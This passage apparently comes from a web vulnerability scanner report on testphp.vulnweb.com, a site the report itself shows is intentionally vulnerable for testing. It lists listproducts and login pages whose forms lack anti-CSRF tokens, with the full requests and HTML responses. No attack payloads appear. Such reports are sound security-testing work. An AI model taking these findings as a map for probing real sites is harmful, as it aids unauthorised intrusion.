style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?cat=1 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 288 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?cat=1 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/categories.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:53 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 7880 |
Response Body - size: 7,880 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Posters</h2><div class='story'><a href='product.php?pic=1'><h3>The shore</h3></a><p><a href='showimage.php?file=./pictures/1.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/1.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=1','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=2'><h3>Mistery</h3></a><p><a href='showimage.php?file=./pictures/2.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/2.jpg&size=160' width='160' height='100'></a>Donec molestie. Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=2','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=3'><h3>The universe</h3></a><p><a href='showimage.php?file=./pictures/3.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/3.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet. Donec molestie. Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=3','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=4'><h3>Walking</h3></a><p><a href='showimage.php?file=./pictures/4.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/4.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. </p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=4','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=5'><h3>Mean</h3></a><p><a href='showimage.php?file=./pictures/5.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/5.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=5','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=7'><h3>Trees</h3></a><p><a href='showimage.php?file=./pictures/7.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/7.jpg&size=160' width='160' height='100'></a>bla bla bla</p><p>painted by: <a href='artists.php?artist=2'>Blad3</a></p><p><a href='#' onClick="window.open('./comment.php?pid=7','comment','width=500,height=400')">comment on this picture</a></p></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?cat=2 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 288 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?cat=2 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/categories.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:53 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5311 |
Response Body - size: 5,311 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Paintings</h2><div class='story'><a href='product.php?pic=6'><h3>Thing</h3></a><p><a href='showimage.php?file=./pictures/6.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/6.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. </p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=6','comment','width=500,height=400')">comment on this picture</a></p></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?cat=3 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 288 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?cat=3 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/categories.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:54 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4699 |
Response Body - size: 4,699 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?cat=4 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 288 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?cat=4 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/categories.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:54 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4699 |
Response Body - size: 4,699 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/login.php |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="loginform" method="post" action="userinfo.php"> |
Request Header - size: 260 bytes. |
GET http://testphp.vulnweb.com/login.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:48 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5523 |
Response Body - size: 5,523 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>login page</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <div class="story"> <h3>If you are already registered please enter your login information below:</h3><br> <form name="loginform" method="post" action="userinfo.php"> <table cellpadding="4" cellspacing="1"> <tr><td>Username : </td><td><input name="uname" type="text" size="20" style="width:120px;"></td></tr> <tr><td>Password : </td><td><input name="pass" type="password" size="20" style="width:120px;"></td></tr> <tr><td colspan="2" align="right"><input type="submit" value="login" style="width:75px;"></td></tr> </table> </form> </div> <div class="story"> <h3> You can also <a href="signup.php">signup here</a>.<br> Signup disabled. Please use the username <font color='red'>test</font> and the password <font color='red'>test</font>. </h3> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/login.php |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 260 bytes. |
GET http://testphp.vulnweb.com/login.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:48 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5523 |
Response Body - size: 5,523 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
